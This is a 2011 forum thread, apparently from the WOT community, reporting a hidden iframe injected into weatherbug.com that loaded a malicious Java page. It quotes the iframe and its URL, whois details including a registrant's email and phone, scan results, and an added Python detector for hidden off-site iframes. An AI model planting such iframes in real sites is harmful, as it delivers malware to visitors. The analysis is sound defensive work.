  1. User picture
    • mketsdev1 on Mon 14 Feb 2011
    • 04:36:37 AM UTC

    Weatherbug.com Malware!

    Yesterday I went in to Weatherbug.com, which I have been doing for years. I noticed a funny Java download rectangle on the screen, and then my computer started beeping as my Symantec began blocking something malicious. There were hundreds of repeat blockage messages. Then my whole desktop was taken over by a bogus "virus" scan, which froze up my whole system. I couldn't close the malware or open anything else. I shut down my system and had my son-in-law, who is an IT person, come over and it took him about 20 minutes to get rid of whatever it was......so Weatherbug has a bug! Anybody else having this problem?

Comments:

  1. User picture
    • Figure10 on Mon 14 Feb 2011
    • 05:18:56 AM UTC

    RE: Weatherbug.com Malware!

    Whatever it is, URLVoid doesn't know about it.

    I ❤ WOT

  2. User picture
    • c۞g on Mon 14 Feb 2011
    • 05:54:59 AM UTC

    RE: Weatherbug.com Malware!

    weatherbug.com has been compromised

    There is an iFrame located in the source, from a direct visit:

    <iframe src="http://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1" style="visibility: hidden;" height="1" width="1">
    </iframe>

    That site when visited directly redirects to google.com
    with the full URL: hxxp://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1
    it loads a page requiring that Java be installed - I get "missing plug-in" warning since I keep Java disabled *always*

    If you use weatherbug, you have facility to contact their support.
    Inform them their site has been compromised and request they remove the hidden iFrame

    Whois information for: x4fw.co.cc
    via: http://www.co.cc/whois/whois.php
    Registrar : CO.CC, INC.
    Whois Server : co.cc
    Referral URL : http://www.co.cc
    Service Type : ZONE RECORD

    Updated Date : 10-Feb-2011
    Creation Date : 10-Feb-2011
    Expiration Date : 10-Feb-2012

    Registrant
    Evgeniy Smirnov
    Moscow, Moscow
    RUSSIAN FEDERATION
    Email : evgeny.smirnov@mail.ru
    Phone : +74952583212

    Updated Date : 09-Feb-2011
    Creation Date : 09-Feb-2011

    Thanks for the alert.

    I submitted an abuse report to CO.CC to pull the domain
    http://www.co.cc/prosecution/prosecution.php
    I suggest others do the same

    Rated
    Malicious content:
    x4fw.co.cc

    [edit]

    Here's a source chart image for:

    x4fwcocc.png

    ∞ - and you and I Opto, ergo sum
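
A check a site owner could run over their own page source to catch the kind of injection described in the post above: an iframe that is hidden by CSS or sized 1x1 and points at a host outside the site. This is an added example, not part of the original thread; the function and class names are hypothetical, and the sample page is constructed around the iframe quoted in the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS declarations that make an element invisible to the visitor.
HIDING_CSS = re.compile(r"(visibility\s*:\s*hidden|display\s*:\s*none)", re.I)

def _tiny(value):
    """True for a width/height attribute of 0 or 1 pixel ("1", "1px", "0")."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= 1

class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are both concealed and loaded from another site."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if HIDING_CSS.search(a.get("style", "")):
            reasons.append("css-hidden")
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("1x1-or-smaller")
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        # Off-site: has a host that is neither the page host nor a subdomain of it.
        off_site = bool(host) and host != self.page_host \
            and not host.endswith("." + self.page_host)
        if reasons and off_site:
            self.findings.append({"src_host": host, "reasons": reasons})

def find_hidden_iframes(html, page_host):
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    return finder.findings

# Constructed sample page: two visible frames plus the iframe quoted in the post.
SAMPLE = """<html><body>
<iframe src="http://weather.weatherbug.com/map" width="300" height="250"></iframe>
<iframe src="http://ads.example.net/slot" width="728" height="90"></iframe>
<iframe src="http://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1" style="visibility: hidden;" height="1" width="1">
</iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE, "weatherbug.com"):
        print(finding)
```

A visible off-site ad frame is not flagged, so the check has to run against the page as actually served to a visitor, since content injected through a third-party ad network never appears in the site's own templates.
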

    • User picture
      • TNS Dude on Sun 20 Feb 2011
      • 01:31:30 AM UTC

      RE: Weatherbug.com Malware!

      If you use weatherbug, just use Yahoo Weather as an alternative until it's fixed.

      And according to VT, no antiviruses detect the content of the malicious URL.... (found out by viewing the downloaded file report)

  3. User picture
    • Satchman on Tue 15 Feb 2011
    • 04:00:39 AM UTC

    RE: Weatherbug.com Malware!

    Checking the box for a recent re-scan of the website by www.urlvoid.com shows that this site has been infected.

    Report 2011-02-15 04:17:03 (GMT 1)
    File Name weatherbug-com
    File Size 49276 bytes
    File Type Unknown file
    MD5 Hash a310f04fb9c28f16b3b7e2eb39142eff
    SHA1 Hash 40d348387481cfb4f7ffe5a89559ee7c36c6c62d
    Detections: 1 / 16 (6 %)
    Status INFECTED

    Antivirus Updated Engine Result
    a-squared 15/02/2011 5.0.0.20 -
    Avast 15/02/2011 5.0 -
    AVG 15/02/2011 9.0.0.725 -
    Avira AntiVir 15/02/2011 7.6.0.59 -
    BitDefender 15/02/2011 7.0.0.2555 -
    ClamAV 15/02/2011 0.96.2.1 -
    Comodo 15/02/2011 4.0 -
    Dr.Web 15/02/2011 5.00.0 -
    F-PROT6 15/02/2011 4.6.1.107 -
    Ikarus T3 15/02/2011 1001084 -
    Kaspersky 15/02/2011 9.0.0.736 -
    NOD32 15/02/2011 4.2.42.0 -
    Panda 15/02/2011 10.0.3.0 -
    TrendMicro 15/02/2011 9.120-1004 -
    VBA32 15/02/2011 3.12.14.1 Malware.HTML.Iframe
    VirusBuster 15/02/2011 1.5.6

    Satch

  4. User picture
    • WeatherBug1 on Tue 15 Feb 2011
    • 02:44:53 PM UTC

    RE: Weatherbug.com Malware!

    I represent WeatherBug. We have looked into this issue and could not find any offending code. Any issue was likely caused by an ad served through a third party ad network. We will be monitoring our ads to avoid any future occurrences.

  5. User picture
    • mketsdev1 on Sat 19 Feb 2011
    • 03:28:53 PM UTC

    RE: Weatherbug.com Malware!

    Thank you! I miss being able to check my local weather stations!

  6. User picture
    • Anonymous on Sat 19 Feb 2011
    • 04:28:36 PM UTC

    RE: Weatherbug.com Malware!

    Gave up on WeatherBug long time back.
    Been dangerous for years to use.
    List of reasons a mile long.

    Have some fun and Google
    http://www.google.com/search?q=weatherbug+spyware&...

    http://www.google.com/search?q=weatherbug+issues&a...

    http://www.google.com/search?q=weatherbug+malware&...

    • User picture
      • siblingshot on Sat 19 Feb 2011
      • 04:50:29 PM UTC

      RE: Weatherbug.com Malware!

      Interesting, DT.

      I use WeatherBug and noticed - from g7w's post - that it had been compromised. In light of that, and your own pointers, it may be high time to drop a little rain on this addon. Rinse my hands. Wash it away.

      The nomenclature itself is a little ironic.

  7. User picture
    • Satchman on Sat 19 Feb 2011
    • 05:59:24 PM UTC

    RE: Weatherbug.com Malware!

    I remember a history of malware from Weatherbug that goes back at least five years, maybe more. It comes and goes and the site is too much of a risk. They used to put toolbars in people's browsers that AV and scanners would diagnose as malware. There's so much better weather information and sites out there than Weatherbug. I love Yahoo Weather! Nothing to install or download and it is very detailed and accurate.

    Satch

    • User picture
      • siblingshot on Sat 19 Feb 2011
      • 06:24:01 PM UTC

      RE: Weatherbug.com Malware!

      Satch.

      Thanks for your alternative recommendation. The very thing which appealed to me about Weatherbug - that it sits quite colourfully and (seemingly) innocuously at the foot of my browser window - is not in itself indispensable.

  8. User picture
    • Anonymous on Sat 19 Feb 2011
    • 06:20:36 PM UTC

    RE: Weatherbug.com Malware!

    I just prefer to look at metar reports, and easiest way is download this: http://www.nirsoft.net/utils/mweather.html
    The other method is to step outside. ~smiles~

  9. User picture
    • Jazspeak on Sat 19 Feb 2011
    • 09:05:56 PM UTC

    RE: Weatherbug.com Malware!

    "The other method is to step outside."

    There's nothing like getting a bit of exercise to make the day seem brighter. Oh, and if you think that the weather is bad then you are probably wearing the wrong clothing. ~double smiles~

    ~Music is not just for the Masses~

  10. User picture
    • AlphaCentauri on Sun 20 Feb 2011
    • 01:17:37 AM UTC

    RE: Weatherbug.com Malware!

    I've been using Weather Watcher for several years and like it much better than Weather Bug because it has no ads. I don't think you can get the free version anymore, though the paid subscription is only $9/year or $44/lifetime subscription.

    Yes, WOT has a wiki. Check there first for fast answers to many questions like "Why is my site rated red, and how do I fix that?"

  11. User picture
    • mketsdev1 on Sun 20 Feb 2011
    • 04:19:48 AM UTC

    RE: Weatherbug.com Malware!

    Thanks everybody! I have come to the conclusion that it just isn't worth it, even if it does have 3 reporting stations within 2 miles of my house, and I am in the center of the triangle. Since I don't have my own equipment, it makes for pretty accurate climatology.....but, I will let it go for the sake of my computer staying viable :)

    • User picture
      • c۞g on Sun 20 Feb 2011
      • 07:59:49 AM UTC

      RE: Weatherbug.com Malware!

      Spyware...
      Started off from a Microsoft mis-classification, but some AV still classify it as "malware" even though it's simple adware.

      FYI The National Weather Service and Homeland Security use Weatherbug's resources...

      for more info: Wikipedia

      As for the compromised HTML with inserted IFRAME that started this thread...
      The IFRAME was removed the next day.
      There is no longer a threat for weather.weatherbug.com

      Anyone ever view source here?

      ∞ - and you and I Opto, ergo sum

  12. User picture
    • tellonem on Sun 20 Feb 2011
    • 08:46:41 AM UTC

    RE: Weatherbug.com Malware!

    Myself use Accuweather or weather.com. Usefulness of weather bug toggles.

    "Bri" for short. Surf safely.